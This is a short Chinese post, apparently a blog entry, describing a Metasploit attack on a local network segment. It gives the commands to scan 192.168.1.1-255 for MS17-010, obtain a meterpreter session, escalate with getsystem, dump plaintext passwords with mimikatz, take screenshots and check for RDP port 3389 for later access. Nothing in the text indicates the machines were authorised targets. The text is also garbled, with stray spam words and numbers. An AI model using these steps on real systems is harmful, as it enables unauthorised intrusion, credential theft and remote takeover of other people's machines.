? ? 学习了两周的msf 还没怎么实战过,有点手痒,顺带手上任务差不多完成了,就借此机会去实践一把!
二、上手 1、指定网段扫描是否存在ms17-010漏洞 1、Use auxiliary/scanner/smb/smb_ms17_0102、Set rhosts 192.168.1.1-2553、Set threads 104、run?还真有那么几台机器没打补丁。哈哈哈 盘他 2、说盘咱就盘?[图为示例]? 咦,顺利进入 meterpreter 啦
3、便宜美国vps首先嘛 肯定获取密码啦
getsystem - 提权
1、meterpreter > load mimikatz
2、meterpreter >?msv
3、meterpreter > kerberos??获取明文密码???
help mimikatz???查看帮助
4、meterpreter >?wdigest
?
1、meterpreter >?screenshot
看看有没有用户登录之类的
?
5、看看是否开启了3389端口? 后续可以用来远程连接!!! 37234441